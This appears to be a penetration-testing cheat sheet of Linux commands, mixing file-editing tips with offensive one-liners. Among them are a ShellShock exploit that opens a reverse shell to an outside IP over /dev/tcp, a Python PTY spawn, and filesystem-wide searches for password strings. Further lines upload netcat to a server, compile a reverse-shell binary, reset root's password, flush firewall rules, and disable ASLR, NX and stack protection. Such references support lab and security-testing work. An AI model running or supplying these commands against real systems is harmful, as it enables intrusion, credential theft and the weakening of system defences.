Useful Commands - Linux

Create a file on Linux:

echo "hello" > /tmp/file.txt
echo "hello" | dd of=/tmp/test.txt
cp /dev/stdin /tmp/file.txt <<< "hello world"
printf "hello\n" >> /tmp/test.txt
sed -i '$ a\hello' /tmp/test.txt

Delete the contents of a file on Linux:

>/tmp/file.log
:>/tmp/file.log
cat /dev/null > /tmp/file.log
cp /dev/null > /tmp/file.log
cp /dev/null /tmp/file.log
dd if=/dev/null of=/tmp/file.log
echo -n > /tmp/file.log
truncate -s 0 /tmp/file.log
ex +%d -scwq /tmp/file.log
vi +%d -escwq /tmp/file.log
install -m600 /dev/null /tmp/file.log

Spawn an interactive PTY from a shell through python

python -c 'import pty; pty.spawn("/bin/bash");'

Base64-encode a string

echo "hello world" | base64 -

Base64-decode a string

echo "aGVsbG8gd29ybGQK" | base64 -d -

Find text in files recursively

grep --exclude-dir={sys,proc,boot,dev,lost+found} -rnw '/' -e "password =" 2>/dev/null

List all files containing a certain string

find / -type f -exec grep -l "passw" {} + 2>/dev/null

Bash loop example

for i in $(seq 1 5);do echo 10.10.10.$i;done

Search and replace text in file

sed -i 's/OLD/NEW/g' /tmp/test
sed -i 's#OLD#NEW#g' /tmp/test
ex -sc '%s/OLD/NEW/g|x' /tmp/test
perl -e 's/OLD/NEW/g' -pi /tmp/test
awk -i inplace '{gsub("OLD", "NEW")}1' /tmp/test

To replace text only if text is found on the 4th line

sed -i '4s/OLD/NEW/g' /tmp/test
gawk -i inplace 'NR==4{gsub(/OLD/,"NEW")}1' /tmp/test
perl -i -pe 's/OLD/NEW/g if $.==4' /tmp/test

Compile (simple) Windows binaries on Linux

wine gcc -o revshell.exe revshell.c -lwsock32 -lws2_32

Upload to website via curl POST or PUT

curl -X POST -F "file=@/bin/nc" "http://10.10.10.10:9999/upload"
curl -X PUT -F "file=@/bin/nc" "http://10.10.10.10:9999/upload"

Test and exploit ShellShock / Bash bug:

env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id
curl -H 'x: () { :;}; /bin/bash -i >& /dev/tcp/20.20.20.20/9999 0>&1' http://10.10.10.10/cgi-bin/admin.cgi

Change password:

(echo 'root:passwd'|chpasswd)

Find common Windows OS Return Addresses (RetAddr) in exploitdb:

for file in $(fgrep -r -l -i "jmp esp" /usr/share/exploitdb/*); do grep -i "jmp esp" $file; done | sort -u | grep -i "xp sp2"

Convert Assembly instruction to byte value:

echo -ne "[BITS 32]\nJMP EAX">b32.asm;nasm b32.asm;ndisasm b32;rm b32.asm;rm b32

Turn off ASLR until next reboot:

sudo echo 0 > /proc/sys/kernel/randomize_va_space
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
sudo sysctl -w kernel.randomize_va_space=0

Turn off NX until next reboot:

sudo sysctl -w kernel.exec-shield=0

Turn off ASLR and NX permanently:

sudo echo 'kernel.randomize_va_space = 0' >> /etc/sysctl.conf
sudo echo 'kernel.exec-shield = 0' >> /etc/sysctl.conf

GCC Compiler flag to turn off NX bit:

-z execstack

GCC Compiler: Turn off stack smashing protection:

-fno-stack-protector

GCC Compiler: Turn off all protections:

-fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -O0

IPTables:

iptables -F                                                 # Remove all firewall rules
iptables -A INPUT -p tcp --destination-port 4444 -j ACCEPT  # Allow TCP/4444

Run an executable that does not have the eXecutable permission set:

root@kali:~# cp /bin/uname /tmp/
root@kali:~# chmod -x /tmp/uname
root@kali:~# ls -al /tmp/uname
-rw-r--r-- 1 root root 31424 Sep 30 14:13 /tmp/uname
root@kali:~# $(find / -name 'ld-linux*.so*' -print -quit 2> /dev/null) /tmp/uname -a
Linux kali 4.14.0-kali3-amd64 #1 SMP Debian 4.14.17-1kali1 (2018-02-16) x86_64 GNU/Linux
root@kali:~#

Display contents of a file name '.' in the current directory:

root@kali:~# ls -ali
92675612 -rw-rw-r--   1 root root    57 Sep 28 08:34 .
root@kali:~# find . -inum 92675612 -exec cat {} \;
this is the content of the file named .